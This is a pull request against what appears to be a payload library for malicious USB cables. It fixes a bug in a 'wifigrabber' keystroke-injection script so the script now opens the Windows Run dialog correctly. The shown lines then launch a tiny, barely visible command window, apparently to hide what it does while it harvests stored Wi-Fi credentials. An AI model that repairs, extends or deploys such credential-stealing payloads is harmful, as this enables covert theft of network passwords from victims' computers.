### PR TITLE
Fix `wifigrabber` bug

### DIFF
--- a/payloads/library/credentials/wifigrabber/payload.txt
+++ b/payloads/library/credentials/wifigrabber/payload.txt
@@ -4,7 +4,7 @@ REM this is designed for the omg cable instead of the tiny.
 
 
 Delay 3000
-STRING GUI r
+GUI r
 Delay 100 
 String cmd /k mode con: cols=15 lines=1
 Enter


### PR DESCRIPTION
As seen in this video: `STRING GUI r` will type `GUI r`, we want to run GUI button + r key to open the `Run` window on windows computers.